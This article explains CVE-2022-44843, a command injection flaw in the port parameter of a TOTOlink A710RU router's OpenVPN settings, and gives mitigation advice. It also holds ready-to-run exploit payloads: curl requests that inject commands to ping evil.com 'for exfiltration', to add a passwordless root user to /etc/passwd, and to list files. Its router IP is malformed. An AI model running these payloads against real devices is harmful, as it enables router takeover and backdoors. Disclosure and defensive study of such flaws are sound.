CVE CyberSecurity Database News

CVE-2022-44843 - Command Injection Vulnerability in TOTOlink A710RU V7.4cu.2313_B20191024 (With Exploit Details)

Poster -

Command injection flaws are some of the most dangerous security issues, especially in network devices like routers. Today, I'll break down a real-world vulnerability, CVE-2022-44843, affecting the TOTOlink A710RU router (firmware version V7.4cu.2313_B20191024), explain why it's critical, how it works (including code snippets), and give you everything you need to understand and confirm it.

What Is The Issue?

A researcher discovered that the TOTOlink A710RU router (with the above firmware version) does not properly sanitize user input in the port parameter of the setting/setOpenVpnClientCfg function. In plain English: if you have access to the router's web interface (like being on its local network), you can send a crafty request to the router and force it to execute any system command. This means you can potentially take over the router, alter its behavior, plant backdoors, or pivot attacks into the network.

The Endpoint

The TOTOlink A710RU has a web management page where you can set up an OpenVPN client. This setup includes specifying the VPN server port:

POST http://<router_ip>/setting/setOpenVpnClientCfg

It takes several parameters — amongst them, port.

The Vulnerability

Inside the router backend code, the value of the port parameter is inserted directly into a system command without any checks for malicious content (no filtering, escaping, etc). That means any string you enter in that field is run directly by the router's OS shell.

Vulnerable code logic (pseudo)

// Simplified pseudo-code based on vulnerability research
char cmd[256];
snprintf(cmd, sizeof(cmd), "openvpn --remote %s --port %s", remote, port);
// 'port' comes directly from user POST data!
system(cmd); // Dangerous: allows command injection

Notice that if port contains any shell metacharacters (like ;), you can break out of the intended command and append another (evil) instruction.

Crafting The Exploit

If you control the network (connected to Wi-Fi, for example), you can craft a HTTP POST request with a malicious port value.

Let’s say you want to make the router ping an external server (for test or exfiltration)

curl -X POST \
  -d "remote=1.2.3.4&port=443;ping -c 4 evil.com;" \
  http://192.168..1/setting/setOpenVpnClientCfg

*Here,*  
- port=443;ping -c 4 evil.com; — the ; breaks the original command, and your malicious ping command runs instead.

For example, to create a new admin user on the router’s OS

curl -X POST \
  -d "remote=1.2.3.4&port=443;echo hacker::::root:/root:/bin/bash >> /etc/passwd;" \
  http://192.168..1/setting/setOpenVpnClientCfg

Impact: High. Full OS command execution as root.

- Authentication? In default cases, the endpoint is protected by web login, but often people leave the router admin interface open, or passwords are weak.

How To Test Safely

Only test routers you own and have permission on.  
To check if your device is vulnerable, try sending a POST with port=443;ls /; and see if you get a list of files.

Python test script

import requests

url = "http://192.168..1/setting/setOpenVpnClientCfg"
payload = {
    "remote": "1.2.3.4",
    "port": "443;ls /;"
}

# You might need to add cookies or session info if router's admin page requires login
r = requests.post(url, data=payload)
print(r.text)

If you see a directory listing in the response (or in the router's filesystem), confirm the flaw.

Update Firmware:

TOTOlink may have released newer firmware. Check their support/download page for the A710RU.

2. Block WAN/Web Access:  
Prevent access to the web admin page from the internet and untrusted networks.

Harden Input Handling:

Router vendors must always sanitize any input used in shell/system calls.

- CVE-2022-44843 NIST entry
- Exploit Details at vulncheck.com
- Original GitHub PoC (Chinese) — with raw HTTP exploit samples.

Conclusion

CVE-2022-44843 is a serious command injection bug in the TOTOlink A710RU router firmware that is easy to exploit and allows attackers to execute arbitrary commands with root privileges. If you have one of these routers, upgrade ASAP or restrict admin access. For researchers and defenders, this is a classic example of why input validation in embedded software is critical.


*Stay safe, patch your stuff, and always use strong passwords on your routers!*

Timeline

Published on: 11/25/2022 20:15:00 UTC
Last modified on: 12/01/2022 17:45:00 UTC